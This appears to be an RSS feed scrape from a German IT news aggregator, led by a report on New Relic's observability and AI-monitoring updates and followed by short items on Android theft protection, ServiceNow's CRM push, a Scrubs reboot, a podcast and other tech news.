<p>New Relic this week updated its <a href="https://newrelic.com/platform" target="_blank" rel="noreferrer noopener">observability platform</a> with new capabilities designed to tie application health and performance directly to <a href="https://www.networkworld.com/article/1298069/new-relic-brings-business-context-to-its-observability-platform.html" target="_blank">business outcomes</a>. The updates will help enterprises that are embedding AI into revenue-generating applications and using code generation tools in their software development processes, New Relic says.</p>



<p><a href="https://www.linkedin.com/in/brian-j-emerson/">Brian Emerson</a>, New Relic’s chief product officer, says there are three forces reshaping <a href="https://www.networkworld.com/article/972187/how-to-shop-for-network-observability-tools.html?utm=hybrid_search" target="_blank">enterprise observability</a>: AI-assisted development, the application explosion that those tools will produce, and the unpredictability introduced when AI is embedded directly into customer-facing workloads.</p>



<p>“When you start embedding AI into applications, non-deterministic things start happening,” Emerson says. “Failures are kind of silent. You need to understand behavior patterns; that’s a very different world than ‘are things red, yellow, or green.’”</p>



<p>For instance, a new feature called Intelligent Workloads can automate the discovery and mapping of application dependencies to create a “360-degree view” of performance, infrastructure, and end-user impact. Intelligent Workloads will communicate key performance indicators (KPI) such as abandoned carts and conversion rates rather than simple green or red technical indicators. </p>



<p>“When your system is slow, is it getting worse, or is that fine?” says <a href="https://www.linkedin.com/in/benders/">Nic Benders</a>, chief technology strategist at New Relic. “Sure, your CPU is high. That’s an infrastructure concern, but what is the impact on whatever it is that you exist to do? That is your number one concern, and we should be speaking to you about that.”</p>



<p>With this release, New Relic also introduced a site reliability engineering (SRE) agent that uses telemetry data such as metrics, events, logs, traces, and node relationships to automate root-cause analysis and prioritize alerts to engineers. New Relic envisions a “digital war room” in which AI agents orchestrate incident response across network, database, and application domains, while network engineers review and approve recommended actions rather than doing the initial triage. New Relic’s 2025 <a href="https://newrelic.com/resources/report/observability-forecast/2025" target="_blank" rel="noreferrer noopener">Observability Forecast</a> found that the majority of organizations are aware of the importance of resolving issues before they impact performance, and the use of AI monitoring capabilities grew from 42% in 2024 to 54% in 2025.</p>



<p>Industry watchers believe that vision will take some time to become a reality across enterprise organizations. </p>



<p>“Every organization is a snowflake in its adoption curve and readiness timeline,” says <a href="https://www.linkedin.com/in/stephen-elliot-2125a8/">Stephen Elliot</a>, global group vice president at IDC. “IT behavioral change is one of the most underreported requirements for agentic AI adoption. Trust is the required ingredient.”</p>



<p>New Relic also expanded its Digital Experience Monitoring suite to support micro frontend (MFE) architectures, where web applications are broken into smaller, team-managed components. Engineers can now monitor every component and collect metrics on performance timing, errors, renders, and lifecycle methods to trace how dependencies affect the end-user experience. Separate agentic AI monitoring capabilities add a service map of agent-to-agent interactions and drill-down traces for individual agents and tools, which New Relic says will address a visibility gap as multi-agent deployments grow.</p>



<p>IDC’s Elliot says the business-outcome framing is an industry-wide trend, but that New Relic’s extension of digital experience management into revenue intelligence is meaningful. “Every vendor needs to communicate value in both technology and business terms,” he explains. “One is no longer enough.”</p>



<p>Elliott also says New Relic’s hybrid OpenTelemetry approach, which lets customers use OTEL instrumentation without separate collector infrastructure, is increasingly table stakes for enterprise buyers. “OTEL is here to stay, and its adoption continues to increase. It is increasingly a product requirement to support as more enterprises make it part of their observability strategies,” Elliot says.</p>



<p>Intelligent Workloads is available as a preview for users of New Relic’s transaction monitoring solution, <a href="https://newrelic.com/kr/events/2026-03-26/improve-business-uptime-with-transaction-360-and-response-intelligence-emea#:~:text=Back,the%20health%20of%20critical%20transactions." target="_blank" rel="noreferrer noopener">Transaction 360</a>. The remaining capabilities are available in preview to all New Relic platform users.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[UK Government: Lack of Skills the Number One Issue in Cybersecurity]]></title>
<description><![CDATA[Andrew Elliot from DCMS provides an update on government initiatives to boost cybersecurity talent pipeline]]></description>
<link>https://tsecurity.de/de/3258013/it-security-nachrichten/uk-government-lack-of-skills-the-number-one-issue-in-cybersecurity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3258013/it-security-nachrichten/uk-government-lack-of-skills-the-number-one-issue-in-cybersecurity/</guid>
<pubDate>Fri, 06 Feb 2026 12:33:21 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Andrew Elliot from DCMS provides an update on government initiatives to boost cybersecurity talent pipeline]]></content:encoded>
</item>
<item>
<title><![CDATA[New Android Theft Protection Feature Updates: Smarter, Stronger]]></title>
<description><![CDATA[Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team


Phone theft is more than just losing a device; it's a form of financial fraud that can leave you suddenly vulnerable to personal data and financial theft. That’s why we're committed to pro...]]></description>
<link>https://tsecurity.de/de/3237886/it-security-nachrichten/new-android-theft-protection-feature-updates-smarter-stronger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3237886/it-security-nachrichten/new-android-theft-protection-feature-updates-smarter-stronger/</guid>
<pubDate>Tue, 27 Jan 2026 19:35:41 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="byline-author">Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team</span>

<p>
Phone theft is more than just losing a device; it's a form of financial fraud that can leave you suddenly vulnerable to personal data and financial theft. That’s why we're committed to providing multi-layered defenses that help protect you before, during, and after a theft attempt.
</p>
<p>
Today, we're announcing a powerful set of theft protection feature updates that build on our<a href="https://security.googleblog.com/2024/10/android-theft-protection.html"> existing protections</a>, designed to give you greater peace of mind by making your device a much harder target for criminals.
</p>
<h3>Stronger Authentication Safeguards</h3>


<p>
We've expanded our security to protect you against an even wider range of threats. These updates are now available for Android devices running Android 16+.
</p>
<p>
<strong>More User Control for Failed Authentications: </strong>In Android 15, <a href="https://blog.google/products/android/android-theft-protection/">we launched</a> Failed Authentication Lock, a feature that automatically locks the device's screen after excessive failed authentication attempts. This feature is now getting a new dedicated enable/disable toggle in settings, giving you more granular control over your device's security.
</p>
<p>
<strong>Expanding Identity Check to cover more: </strong><a href="https://security.googleblog.com/2025/01/android-theft-protection-identity-check-expanded-features.html">Early in 2025</a>, we enabled Identity Check for Android 15+, which requires the user to utilize biometrics when performing certain actions outside of trusted places. Later in the year, we extended this safeguard to cover all features and apps that use the Android Biometric Prompt. This means that critical tools that utilize Biometric Prompt, like third-party banking apps and Google Password Manager, now automatically benefit from the additional security of Identity Check.
</p>
<p>
<strong>Stronger Protection Against Screen Lock Guessing: </strong>We’re making it much harder for a thief to guess your PIN, pattern, or password by increasing the lockout time after failed attempts. To ensure you aren’t locked out by mistake (<a href="https://www.linkedin.com/pulse/how-my-son-secured-android-lockscreen-jeremiah-cox-vn88c/">by a curious child</a>, for instance), identical incorrect guesses no longer count toward your retry limit. 
</p>
<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVh6O_BTgr0Y5vICILPIdLfewGVuyy6CbPwm-MswORJJOuvoZnXnFD4A4-3uo0iUa0bKWCxVs5E5RQy1kvWFSI6cmYYcbUqHlucIEqLkszJ-kxrcWhqn_HXVuRPglXmtUe1gPRwHaYZ-K9GBQWCPW0izyvLIMr5Rus8e9BZUPFXJTG5LjivTdUFIEiQdtB/s3816/Android%20Theft%20Protection_Image.png"><img alt="" border="0" height="600" data-original-height="3816" data-original-width="2520" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVh6O_BTgr0Y5vICILPIdLfewGVuyy6CbPwm-MswORJJOuvoZnXnFD4A4-3uo0iUa0bKWCxVs5E5RQy1kvWFSI6cmYYcbUqHlucIEqLkszJ-kxrcWhqn_HXVuRPglXmtUe1gPRwHaYZ-K9GBQWCPW0izyvLIMr5Rus8e9BZUPFXJTG5LjivTdUFIEiQdtB/s600/Android%20Theft%20Protection_Image.png"></a></div>
  
]]></content:encoded>
</item>
<item>
<title><![CDATA[New Android Theft Protection Feature Updates: Smarter, Stronger]]></title>
<description><![CDATA[Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team Phone theft is more than just losing a device; it’s a form of financial fraud that can leave you suddenly vulnerable to personal data and…
Read more →
The post New Android Theft Protection F...]]></description>
<link>https://tsecurity.de/de/3237883/it-security-nachrichten/new-android-theft-protection-feature-updates-smarter-stronger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3237883/it-security-nachrichten/new-android-theft-protection-feature-updates-smarter-stronger/</guid>
<pubDate>Tue, 27 Jan 2026 19:35:37 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team Phone theft is more than just losing a device; it’s a form of financial fraud that can leave you suddenly vulnerable to personal data and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-android-theft-protection-feature-updates-smarter-stronger/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-android-theft-protection-feature-updates-smarter-stronger/">New Android Theft Protection Feature Updates: Smarter, Stronger</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Balancing Security with Tenant Privacy]]></title>
<description><![CDATA[Bala Consulting Engineers is the 2025 recipient of the Elliot A. Boxerbaum award.]]></description>
<link>https://tsecurity.de/de/3145774/it-security-nachrichten/balancing-security-with-tenant-privacy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3145774/it-security-nachrichten/balancing-security-with-tenant-privacy/</guid>
<pubDate>Mon, 08 Dec 2025 15:50:53 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Bala Consulting Engineers is the 2025 recipient of the Elliot A. Boxerbaum award.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ep 49: Elliot]]></title>
<description><![CDATA[In this episode we meet Elliot Alderson (@fs0c131y) from Twitter. Who is this strange masked person? What adventures have they gotten themselves into? Many stories will be told. The mask will be lifted.SponsorsThis episode was sponsored by Thinkst Canary. Their canaries attract malicious actors i...]]></description>
<link>https://tsecurity.de/de/3106013/podcasts/ep-49-elliot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3106013/podcasts/ep-49-elliot/</guid>
<pubDate>Wed, 19 Nov 2025 00:38:14 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this episode we meet Elliot Alderson (<a href="https://twitter.com/fs0c131y"><strong>@fs0c131y</strong></a>) from Twitter. Who is this strange masked person? What adventures have they gotten themselves into? Many stories will be told. The mask will be lifted.</p><p><br></p><p>Sponsors</p><p>This episode was sponsored by <a href="https://canary.tools/"><strong>Thinkst Canary</strong></a>. Their canaries attract malicious actors in your network and then send you an alert if someone tries to access them. Great early warning system for knowing when someone is snooping around where they shouldn’t be. Check them out at <a href="https://canary.tools/"><strong>https://canary.tools</strong></a>.</p><p>Go to <a href="https://nordvpn.com/darknet"><strong>https://nordvpn.com/darknet</strong></a> to get 70% off a 3 year plan and use code darknet for an extra month for free!</p><p><br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Football Manager 26 Review (PC)]]></title>
<description><![CDATA[Liverpool is at the top of the Premier League, but it might be unsustainable. Van Dijk and Salah are injured, the latter for up to two months. There are another 15 players, including every first choice but Alisson, who are at high risk of injury. My choice to play a high tempo with a lot of track...]]></description>
<link>https://tsecurity.de/de/3081282/it-security-nachrichten/football-manager-26-review-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3081282/it-security-nachrichten/football-manager-26-review-pc/</guid>
<pubDate>Wed, 05 Nov 2025 14:04:39 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Liverpool is at the top of the Premier League, but it might be unsustainable. Van Dijk and Salah are injured, the latter for up to two months. There are another 15 players, including every first choice but Alisson, who are at high risk of injury. My choice to play a high tempo with a lot of tracking back for everyone is the probable cause for this issue.

The solution to the problem is more rotation in the first eleven, coupled with a tweak to the tactical system. For the last five matches, the opposition’s goalkeeper was their best-rated player, even when we won by just one goal. So, the team also needs to become better at scoring, without losing any of its defensive teeth.

It doesn’t help that Newcastle refused to sell Isak for a sensible fee and that Florian Wirtz, just like in the real world, is having trouble integrating into the squad. We have no clear replacement for Salah, but Harvey Elliot will have to work to fulfill the same role. It would also be nice if...]]></content:encoded>
</item>
<item>
<title><![CDATA[Mark Zuckerberg verklagt Meta – das steckt dahinter]]></title>
<description><![CDATA[Nein, Facebook-Gründer Mark Zuckerberg verklagt nicht sein eigenes Unternehmen. Wie Techcrunch berichtet, ist es stattdessen ein amerikanischer Anwalt gleichen Namens, der endgültig genug hat und sich entschlossen hat, den Social-Media-Riesen Meta zu verklagen.



Der Anwalt Mark Stephen Zuckerbe...]]></description>
<link>https://tsecurity.de/de/2972267/it-nachrichten/mark-zuckerberg-verklagt-meta-das-steckt-dahinter/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2972267/it-nachrichten/mark-zuckerberg-verklagt-meta-das-steckt-dahinter/</guid>
<pubDate>Mon, 08 Sep 2025 15:15:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nein, Facebook-Gründer Mark Zuckerberg verklagt nicht sein eigenes Unternehmen. <a href="https://techcrunch.com/2025/09/04/mark-zuckerberg-sues-mark-zuckerberg/" target="_blank" rel="noreferrer noopener">Wie Techcrunch berichtet</a>, ist es stattdessen ein amerikanischer Anwalt gleichen Namens, der endgültig genug hat und sich entschlossen hat, den Social-Media-Riesen Meta zu verklagen.</p>



<p>Der Anwalt Mark <em>Stephen </em>Zuckerberg hat auf Facebook für seine Anwaltskanzlei geworben, wie viele Unternehmen es tun. Meta hat sein Konto aber in den letzten acht Jahren <strong>fünfmal </strong>geschlossen, weil es der Meinung war, dass es sich um den CEO des Unternehmens Mark <em>Elliot </em>Zuckerberg handelte. Oder dass jemand ihn nachahmen wollte.</p>



<p>Der Tropfen, der das Fass zum Überlaufen brachte und Herrn Zuckerberg dazu veranlasste, Meta zu verklagen, war aber etwas anderes. Und zwar die Tatsache, dass Facebook ihm weiterhin Gebühren für die Werbung für das Konto der Anwaltskanzlei in Rechnung stellte, selbst nachdem das Unternehmen es geschlossen hatte.</p>



<p>Auf seiner <a href="https://iammarkzuckerberg.com/" target="_blank" rel="noreferrer noopener">Webseite</a> beschreibt Herr Zuckerberg, wie es ist, einen Namen mit dem Facebook-Gründer zu teilen. Unter anderem kann er seinen Namen nicht für Restaurantbuchungen verwenden, da dies sofort für einen Scherzanruf gehalten wird, und er erhält ständig Briefe mit Verbesserungsvorschlägen für Facebook.</p>



<p>Ein anderes Mal, als er in Las Vegas einen Vortrag halten sollte, wartete ein Chauffeur auf ihn und hielt ein Schild mit seinem Namen in die Höhe. Um ihn herum versammelte sich dann eine Gruppe von Leuten, die darauf warteten, dass der “andere” Mark Zuckerberg auftauchen würde. </p>



<p>Weniger amüsant seien aber vor allem die Todesdrohungen, die er teilweise erhält. Dennoch wünscht er dem Meta-CEO nichts Schlechtes und würde ihn sogar liebend gerne als Anwalt vertreten, sollte er sich mal in Indiana vor Gericht verteidigen müssen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why LinkedIn Rewards Mediocrity]]></title>
<description><![CDATA[LinkedIn's engagement-driven algorithm systematically elevates shallow, meaningless content over substantive professional discourse, according to a new analysis that highlights how major platforms prioritize user retention metrics over content quality. Entrepreneur and product executive Elliot Sm...]]></description>
<link>https://tsecurity.de/de/2952808/it-security-nachrichten/why-linkedin-rewards-mediocrity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2952808/it-security-nachrichten/why-linkedin-rewards-mediocrity/</guid>
<pubDate>Fri, 22 Aug 2025 03:18:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LinkedIn's engagement-driven algorithm systematically elevates shallow, meaningless content over substantive professional discourse, according to a new analysis that highlights how major platforms prioritize user retention metrics over content quality. Entrepreneur and product executive Elliot Smith describes encountering a "seemingly endless stream of posts that are over fluffed, over produced and ultimately say nothing" that he categorizes as "toxic mediocrity." 

Smith argues the platform's reward system creates a destructive cycle where "comments, likes and other engagement" signal user activity to LinkedIn's algorithm, which then promotes similar vapid content. "LinkedIn wants you on LinkedIn," Smith writes, noting the Microsoft-owned platform correlates engagement with ad clicks and premium conversions. Smith recommends professionals focus on substantive work rather than platform gaming, arguing "nothing you post there is going to change your career."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Why+LinkedIn+Rewards+Mediocrity%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F25%2F08%2F21%2F2045209%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F25%2F08%2F21%2F2045209%2Fwhy-linkedin-rewards-mediocrity%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/25/08/21/2045209/why-linkedin-rewards-mediocrity?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scrubs: Diese 3 Hauptcharaktere kehren zurück!  - doch eine Figur werden Fans schmerzlich vermissen]]></title>
<description><![CDATA[Endlich ist es offiziell: Die Kult-Sitcom "Scrubs" kehrt zurück! JD, Turk und Elliot arbeiten wieder im Sacred Heart Krankenhaus. Doch eine Figur wird schmerzlich vermisst.
																					Dieser Artikel wurde einsortiert unter 
																	Entertainment,																	Serien,								...]]></description>
<link>https://tsecurity.de/de/2885196/it-nachrichten/scrubs-diese-3-hauptcharaktere-kehren-zurueck-doch-eine-figur-werden-fans-schmerzlich-vermissen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2885196/it-nachrichten/scrubs-diese-3-hauptcharaktere-kehren-zurueck-doch-eine-figur-werden-fans-schmerzlich-vermissen/</guid>
<pubDate>Mon, 14 Jul 2025 15:45:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Endlich ist es offiziell: Die Kult-Sitcom "Scrubs" kehrt zurück! JD, Turk und Elliot arbeiten wieder im Sacred Heart Krankenhaus. Doch eine Figur wird schmerzlich vermisst.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/scrubs-anfaenger/index.html">Scrubs: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/rick-and-morty/index.html">Rick and Morty: Episodenguide und Staffeln</a>,																	<a href="https://www.netzwelt.de/serien/ted-lasso/index.html">Ted Lasso: Staffeln und Episodenguide</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[&quot;Scrubs&quot;: Das große Comeback der Krankenhaus-Comedy steht bevor - Mit der kreativen Kraft von &quot;Ted Lasso&quot; und &quot;Rick and Morty&quot;!]]></title>
<description><![CDATA[Endlich ist es offiziell: Die Kult-Sitcom "Scrubs" kehrt zurück! JD, Turk und Elliot arbeiten wieder im Sacred Heart Krankenhaus. Mit der Power von "Ted Lasso" und "Rick and Morty"! 
																					Dieser Artikel wurde einsortiert unter 
																	Entertainment,																	Serie...]]></description>
<link>https://tsecurity.de/de/2881373/it-nachrichten/quotscrubsquot-das-grosse-comeback-der-krankenhaus-comedy-steht-bevor-mit-der-kreativen-kraft-von-quotted-lassoquot-und-quotrick-and-mortyquot/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2881373/it-nachrichten/quotscrubsquot-das-grosse-comeback-der-krankenhaus-comedy-steht-bevor-mit-der-kreativen-kraft-von-quotted-lassoquot-und-quotrick-and-mortyquot/</guid>
<pubDate>Fri, 11 Jul 2025 20:30:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Endlich ist es offiziell: Die Kult-Sitcom "Scrubs" kehrt zurück! JD, Turk und Elliot arbeiten wieder im Sacred Heart Krankenhaus. Mit der Power von "Ted Lasso" und "Rick and Morty"! 
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/scrubs-anfaenger/index.html">Scrubs: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/rick-and-morty/index.html">Rick and Morty: Episodenguide und Staffeln</a>,																	<a href="https://www.netzwelt.de/serien/ted-lasso/index.html">Ted Lasso: Staffeln und Episodenguide</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[„Scrubs“ kehrt zurück: Das ist über das Reboot bekannt]]></title>
<description><![CDATA[Dr. Dorian praktiziert wieder: Fünfzehn Jahre nach dem Ende von „Scrubs – Die Anfänger“ soll es eine Neuauflage geben. Auch Zach Braff ist dabei.Wird „Scrubs“ fortgesetzt?Nach neun Staffeln und 182 Episoden war im Jahr 2010 vorerst Schluss mit den Geschichten rund um J.D., Turk, Carla, Elliot und...]]></description>
<link>https://tsecurity.de/de/2851120/it-nachrichten/scrubs-kehrt-zurueck-das-ist-ueber-das-reboot-bekannt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2851120/it-nachrichten/scrubs-kehrt-zurueck-das-ist-ueber-das-reboot-bekannt/</guid>
<pubDate>Wed, 25 Jun 2025 16:00:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><b>Dr. Dorian praktiziert wieder: Fünfzehn Jahre nach dem Ende von „Scrubs – Die Anfänger“ soll es eine Neuauflage geben. Auch Zach Braff ist dabei.</b></p><h2>Wird „Scrubs“ fortgesetzt?</h2><p>Nach <b>neun Staffeln und 182 Episoden</b> war im Jahr 2010 vorerst Schluss mit den Geschichten rund um J.D., Turk, Carla, Elliot und Co. Doch nun soll „Scrubs – Die Anfänger“ in einer Neuauflage zurückkehren.</p><p>Ende 2024 berichteten US-Medien, dass die beliebte Krankenhaus-Sitcom einen Reboot erhält. Auch wenn der Sender ABC sich zunächst nicht offiziell äußerte, <b>teilte Schauspieler Zach Braff die Neuigkeiten in seiner Instagram-Story</b>.</p><p><i>Was aus dem Serien-Cast nach Drehende wurde, erfahrt ihr im Video:</i></p>LinkWas wurde aus dem Cast von Scrubs<h2>Zach Braff ist beim Reboot dabei</h2><p>Für „Scrubs“-Fans ist das ein Grund zur Freude, denn Braff spielte in der originalen Serie den <b>Hauptcharakter Dr. John Michael Dorian</b>, besser bekannt als J.D. Wie Deadline berichtet, gab es lange Verhandlungen, bis Braff die Rolle zusagte.</p><p>Unter anderem soll der Drehort ein Streitpunkt gewesen sein. Ursprünglich wollte Produzent Bill Lawrence, der auch schon die vorherigen Staffeln umsetzte, in Kanada drehen. Braff lebt aber in L.A. Letztlich haben sich beide Parteien anscheinend geeinigt, auch wenn offiziell <b>noch kein Drehort bekanntgegeben</b> wurde.</p><h2>Wann startet der „Scrubs“-Reboot?</h2><p>Die Neuauflage der Krankenhaus-Sitcom soll eine <b>Mischung aus einem Wiedersehen</b> mit den bekannten Charakteren und einem <b>Neustart mit frischem Personal</b> sein. Derzeit ist die Entwicklung des Revivals in vollem Gange.</p><p>Ob weitere Original-Schauspieler wie Donald Faison als Turk, Sarah Chalke als Elliot oder Judy Reyes als Carla ebenfalls am Start sind, muss erst geklärt werden. Die<b> Dreharbeiten haben also noch nicht begonnen</b>. Zudem wird die Serie zunächst in den USA laufen, bevor wir hierzulande die deutschen Folgen des „Scrubs“ Reboots ansehen können.</p><p>Da ABC, der amerikanische Heimatsender von „Scrubs“, zu Disney gehört, könnte die Sitcom in Deutschland <b>auf Disney+</b> erscheinen.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr Robot Hacks: Building a Deadman’s Switch in Python]]></title>
<description><![CDATA[Welcome back, my Mr Robot aficionados! As you know, Mr. Robot is my favorite TV show because of its realistic depiction of hacking. Nearly all of the hacks in the show are real, although the time frame may be compressed (real hacking is not like a TikTok video). In the first season, Elliot’s “gir...]]></description>
<link>https://tsecurity.de/de/2780841/it-security-nachrichten/mr-robot-hacks-building-a-deadmans-switch-in-python/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2780841/it-security-nachrichten/mr-robot-hacks-building-a-deadmans-switch-in-python/</guid>
<pubDate>Fri, 16 May 2025 19:19:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welcome back, my Mr Robot aficionados! As you know, Mr. Robot is my favorite TV show because of its realistic depiction of hacking. Nearly all of the hacks in the show are real, although the time frame may be compressed (real hacking is not like a TikTok video). In the first season, Elliot’s “girlfriend”, Shayla, […]</p>
<p>The post <a href="https://hackers-arise.com/mr-robot-hacks-building-a-deadman-s-switch-in-python/">Mr Robot Hacks: Building a Deadman’s Switch in Python</a> first appeared on <a href="https://hackers-arise.com/">Hackers Arise</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow puts Salesforce in the crosshairs with expanded CRM tools]]></title>
<description><![CDATA[ServiceNow has jumped deep into the customer relationship management (CRM) market with a new set of capabilities powered by AI.



The longtime IT service management platform provider entered the CRM space in early 2025, but it rolled out several new capabilities at it Knowledge 2025 conference t...]]></description>
<link>https://tsecurity.de/de/2762060/it-security-nachrichten/servicenow-puts-salesforce-in-the-crosshairs-with-expanded-crm-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2762060/it-security-nachrichten/servicenow-puts-salesforce-in-the-crosshairs-with-expanded-crm-tools/</guid>
<pubDate>Wed, 07 May 2025 11:47:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.cio.com/article/3477783/servicenow-latest-news-and-insights.html">ServiceNow</a> has jumped deep into the <a href="https://www.cio.com/article/272365/what-is-crm-software-for-managing-customer-data.html">customer relationship management (CRM)</a> market with a new set of capabilities powered by AI.</p>



<p>The longtime IT service management platform provider <a href="https://www.cxtoday.com/crm/servicenow-enters-the-crm-market-with-a-purpose-were-not-just-building-a-slightly-better-product/" rel="nofollow">entered the CRM space</a> in early 2025, but it rolled out several new capabilities at it Knowledge 2025 conference this week in direct competition with CRM giant Salesforce.</p>



<p>Rumblings in late 2024 that ServiceNow had CRM designs prompted Salesforce CEO Marc Benioff to call ServiceNow “Wienerschnitzel” to Salesforce’s “McDonald’s” on <a href="https://www.youtube.com/watch?v=bqdOfu9wVLQ&amp;ab_channel=CNBCTelevision" rel="nofollow">Jim Cramer’s <em>Mad Money </em>show</a>, referencing the fast-food chains.</p>



<p>More recently, ServiceNow CEO Bill McDermott <a href="https://www.linkedin.com/posts/billrmcdermott_servicenows-latest-move-even-salesforce-activity-7296326115315335169-d_De/" rel="nofollow">shared an article on LinkedIn</a> about Salesforce “bracing for impact” from ServiceNow’s move into the space, adding that ServiceNow was “not just enhancing CRM — we’re redefining it as the AI platform for business transformation.”</p>



<p>The company followed that up with its biggest acquisition to date, <a href="https://www.cio.com/article/3842626/servicenow-to-acquire-moveworks-to-strengthen-agentic-ai-and-enterprise-search.html">the $2.85 billion acquisition of AI platform company Moveworks</a>, which has been seen as a crucial step toward that goal.</p>



<h2 class="wp-block-heading">ServiceNow’s CRM pitch</h2>



<p>The ServiceNow CRM product covers sales and order management, field service management, and customer service management, and expands on the previous CRM offering through AI-powered automation and a unified platform approach, according to the company.</p>



<p>Without naming Salesforce, company executives criticized current CRMs as being limited to only part of the customer relationship journey.</p>



<p>Traditional CRM systems prioritize on sales assistance, but ServiceNow is focused on connecting sales, service, and product fulfillment on one platform, said Terence Chesire, vice president of CRM and industry workflows at ServiceNow. Traditional CRMs have often failed to create better customer experiences, he adds.</p>



<p>“For over a decade, legacy CRM vendors promised a world that a 360 view and omnichannel was the Holy Grail, and all you had to do is offer voice, web, email, chat, and messaging, and magic would occur,” he said during a Knowledge 2025 preview briefing. “But it didn’t.”</p>



<p>Omnichannel customer communications are important but just half of the story, when frustrating chatbots and frenzied agents create a less-than-satisfactory experience for customers, he added.</p>



<p>“The other half of the story is how you solve the real pain points in the customer experience,” Chesire said. “In customer service, you need more than just great omnichannel intake of a request, you also need to orchestrate and automate the hard part, which is the resolution and fulfillment.”</p>



<h2 class="wp-block-heading">Focus on customer service and engagement</h2>



<p>ServiceNow’s expansion into the CRM market has been welcomed by some experts and analysts. The company has deep roots in customer service, while some other CRM vendors entered the market with a focus on sales automation, said Chuck Schaeffer, managing director of Johnny Grow, a management consultancy. ServiceNow has a rare opportunity to deliver a more holistic CRM system, he added.</p>



